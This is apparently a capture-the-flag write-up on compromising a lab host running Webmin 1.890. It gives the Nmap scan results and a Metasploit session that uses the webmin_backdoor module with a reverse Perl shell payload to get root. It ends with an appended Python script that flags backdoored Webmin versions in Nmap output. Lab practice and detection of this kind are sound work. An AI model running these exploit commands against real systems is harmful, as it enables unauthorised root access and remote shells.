First I ran an Nmap scan, from which we see that ports 22 and 10000 are open. We also see that port 10000 runs a web service called Webmin.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b74cd0bde27b1b15722764562915ea23 (RSA)
| 256 b78523114f44fa22008e40775ecf287c (ECDSA)
|_ 256 a9fe4b82bf893459365becdac2d395ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 7B403D3D5C87B168EA5B8ADA089E342C
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
After looking through the webpage, which requires SSL (https), I searched for known vulnerabilities in Webmin and found . Metasploit has an exploit for this one, which makes things very easy. I configured it as such and got immediate root access.
I don't think that was the intended way of doing things, but it worked very well.
msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > set rhost 10.10.186.27
rhost => 10.10.186.27
msf6 exploit(linux/http/webmin_backdoor) > set lhost tun0
lhost => NOTSHOWN
msf6 exploit(linux/http/webmin_backdoor) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_backdoor) > run
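For defenders, the same Nmap service banner that revealed MiniServ 1.890 can drive an inventory check. The following is an added example, not part of the original write-up: it parses Nmap service lines and flags Webmin releases in the backdoored range. The version range is an assumption taken from Webmin's public advisory rather than from this page, and the function names and the extra sample lines are constructed for illustration.

```python
import re

# Assumption (Webmin's public advisory, not this page): 1.890 shipped the
# backdoor exploitable in the default configuration; 1.900 through 1.920
# carried it but only exposed it when expired-password changing was enabled.
DEFAULT_EXPLOITABLE = (1, 890)
BACKDOOR_RANGE = ((1, 890), (1, 920))

# One Nmap normal-output service line: "10000/tcp open http MiniServ 1.890 (...)"
SERVICE_LINE = re.compile(
    r"^(?P<port>\d+)/(?:tcp|udp)\s+(?P<state>\S+)\s+\S+\s*(?P<version>.*)$"
)
MINISERV = re.compile(r"MiniServ\s+(\d+)\.(\d+)")

def classify(version):
    """Map a (major, minor) Webmin version to a risk label."""
    if version == DEFAULT_EXPLOITABLE:
        return "backdoored-default"
    low, high = BACKDOOR_RANGE
    if low <= version <= high:
        return "backdoored-if-password-change-enabled"
    return "not-in-backdoored-range"

def find_webmin(nmap_text):
    """Return (port, version string, label) for every open MiniServ service."""
    findings = []
    for line in nmap_text.splitlines():
        m = SERVICE_LINE.match(line.strip())
        if not m or m["state"] != "open":
            continue  # script output ("|" lines), headers, closed ports
        v = MINISERV.search(m["version"])
        if v:
            version = (int(v[1]), int(v[2]))
            findings.append((int(m["port"]), f"{v[1]}.{v[2]}", classify(version)))
    return findings

# First two service lines are from the scan above; the rest are constructed.
SAMPLE_SCAN = """\
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
10001/tcp open http MiniServ 1.910 (Webmin httpd)
10002/tcp open http MiniServ 1.930 (Webmin httpd)
10003/tcp closed http
"""

if __name__ == "__main__":
    for port, version, label in find_webmin(SAMPLE_SCAN):
        print(f"port {port}: Webmin {version} -> {label}")
```

Any host flagged by this check should be upgraded to a fixed Webmin release and reviewed for signs of prior compromise, since the backdoor runs commands as root.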